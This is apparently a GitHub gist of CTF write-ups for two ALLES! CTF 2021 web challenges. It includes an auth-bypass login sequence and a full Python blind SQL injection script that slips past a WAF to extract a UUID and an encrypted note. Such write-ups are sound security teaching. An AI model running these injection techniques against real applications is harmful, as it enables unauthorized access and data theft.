Skip to content

Instantly share code, notes, and snippets.

@arkark

arkark/alles-ctf-2021.md

Last active September 5, 2021 04:51
Show Gist options
  • Save arkark/66bb3042992eb6a2258cc04314435737 to your computer and use it in GitHub Desktop.
Save arkark/66bb3042992eb6a2258cc04314435737 to your computer and use it in GitHub Desktop.
Download ZIP
ALLES! CTF 2021
Raw
alles-ctf-2021.md

ALLES! CTF 2021

[web] J(ust)-S(erving)-P(ages)

$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
Set-Cookie: JSESSIONID=7D12EE368BD32FB4C496CBE29BA4A23D; Path=/; HttpOnly

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
... snip ...
    <p>
        <div class="alert alert-success" role="alert">
            User configuration updated
          </div>
    </p>
</main><!-- /.container -->
</html>


$ http --session=./session.json --form POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/login" username=admin password=da39a3ee5e6b4b0d3255bfef95601890afd80709
HTTP/1.1 200
Content-Length: 2935
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:37 GMT


<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
... snip ...
    <h1>Welcome to the User Panel</h1>


        You are <b></b>admin</b>
                <br><br>
                Your flag is:
ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}

                <br>

                <a href="logout">Logout</a>
</main><!-- /.container -->
</html>

da39a3ee5e6b4b0d3255bfef95601890afd80709 is SHA-1 of an empty string.

Flag: ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}

[web] Amazing Crypto WAF

$ python exploit.py

4
4c
4ca
... snip ...
4ca51bd230de44bbb2f7fab021cc73
4ca51bd230de44bbb2f7fab021cc730
user_uuid: 4ca51bd230de44bbb2f7fab021cc730e
ENCRYPT:
ENCRYPT:c
ENCRYPT:c1
... snip ...
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT0
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
cipher_note: ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
<!doctype html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
        <title>noter</title>
    </head>
    <body class="bg-gray-50">
        <div class="flex flex-row bg-gray-100 px-5 py-2">


            <a href="/notes" class="hover:underline hover:text-green-500 text-black py-1 px-4 font-bold">

                noter <span class="text-green-500" style="font-size:.6rem">DEMO</span>
            </a>


                <a href="/notes" class="hover:underline hover:text-green-600 text-green-500 py-1 px-4 mr-2">ALLES!{American_scientists_said,_dont_do_WAFs!}</a>
                <a href="/logout">
... snip ...

Flag: ALLES!{American_scientists_said,_dont_do_WAFs!}

Raw
exploit.py
import httpx
import random
import string
# ALLES! CTF 2021
# [web] Amazing Crypto WAF
# URL = "http://localhost:5000/"
URL = "https://7b0000005f7830b2f97927b7-amazing-crypto-waf.challenge.master.allesctf.net:31337/"
with httpx.Client() as client:
username = ''.join(random.choice(string.ascii_letters) for _ in range(10))
password = ''.join(random.choice(string.ascii_letters) for _ in range(10))
res = client.post(
URL + "registerlogin",
data={
"username": username,
"password": password,
},
allow_redirects=False
)
assert res.status_code == 302
note_body = "hogehogehoge"
res = client.post(
URL + "add_note",
data={
"title": "aaaaaa",
"body": note_body,
},
allow_redirects=False
)
assert res.status_code == 302
# --
chars = "0123456789abcdef"
prefix = ""
for i in range(32):
print(prefix)
ok = -1
ng = len(chars)
while ng - ok > 1:
mid = (ok + ng)//2
res = client.get(
URL + "notes%3f",
params=f"order=1&order=asc limit (iif((select 1 from users where username='flagger' and uuid glob '{prefix}[{chars[mid:]}]*'), 1, 0))/*=x",
)
assert res.status_code == 200
assert res.text != "error"
if note_body in res.text:
ok = mid
else:
ng = mid
assert ok >= 0
prefix += chars[ok]
user_uuid = prefix
print("user_uuid:", user_uuid)
# --
chars = "=+/" + string.ascii_letters + string.digits
prefix = "ENCRYPT:"
while True:
print(prefix)
ok = -1
ng = len(chars)
while ng - ok > 1:
mid = (ok + ng)//2
res = client.get(
URL + "notes%3f",
params=f"order=1&order=asc limit (iif((select 1 from notes where user='{user_uuid}' and body glob '{prefix}[{chars[mid:]}]*'), 1, 0))/*=x",
)
assert res.status_code == 200
assert res.text != "error"
if note_body in res.text:
ok = mid
else:
ng = mid
if ok == -1:
break
prefix += chars[ok]
cipher_note = prefix
print("cipher_note:", cipher_note)
# --
res = client.get(
URL + "logout",
allow_redirects=False,
)
assert res.status_code == 302
res = client.post(
URL + "registerlogin",
data={
"username": cipher_note,
"password": password,
},
allow_redirects=True
)
assert res.status_code == 200
print(res.text)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment